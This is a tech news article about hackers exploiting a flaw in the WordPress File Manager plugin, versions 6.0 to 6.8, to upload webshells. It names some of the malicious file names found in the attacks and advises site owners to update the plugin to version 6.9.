Websites on WordPress are currently being exploited by hackers due to a vulnerability found in one of the plugins that are frequently used in the development of these sites.
The plugin, which is called ‘File Manager’, is currently used by more than 700,000 websites. Web developers use it to manage the files they work with while creating sites using WordPress.
File Manager also contains another plugin called elFinder. The vulnerability being exploited is as a result of the way File Manager integrates elFinder into its own functionality.
What this could mean for your WordPress website
Generally, sites are protected by passwords and profiles which determine the areas of a site that any person can access or modify. Through the File Manager plugin, hackers have found a way to access the site and upload harmful files. The files contain images which have webshells hidden in them.
With the webshells, the hackers can run commands in the place (directory) where the File Manager plugin is stored on your website. Some of the files that hackers tried to compromise sites with have been discovered to have names such as hardfork.php, hardfind.php and x.php.
Already, 450,000 attempts of this kind have been blocked by a website security firm, WordFence.
Once the hackers have been able to access the website, they can expand the privileges they have on the site. With this, they can go on to make changes to the existing files on the site or upload new files of their own. The files can contain anything from lewd images to written content that is not in line with what the website offers to its audience. The files could also be used to steal stored data.
According to Chloe Chamberland, a threat analyst at Wordfence, “a file manager plugin like this would make it possible for an attacker to manipulate or upload any files of their choosing directly from the WordPress dashboard, potentially allowing them to escalate privileges once in the site’s admin area.”
“For example, an attacker could gain access to the admin area of the site using a compromised password, then access this plugin and upload a webshell to do further enumeration of the server and potentially escalate their attack using another exploit.”
How to prevent your site from being attacked
The vulnerabilities have so far been successful on websites that use File Manager versions 6.0 to 6.8. The latest version that addresses the vulnerability has, however, been released.
To prevent an attack on your site, what you should do is make sure that your site updates the plugin to its latest version, which is 6.9. If you are not sure how to do this, your site’s developer will be able to get it done.
Get the best of Africa’s daily tech to your inbox – first thing every morning.
Join the community now!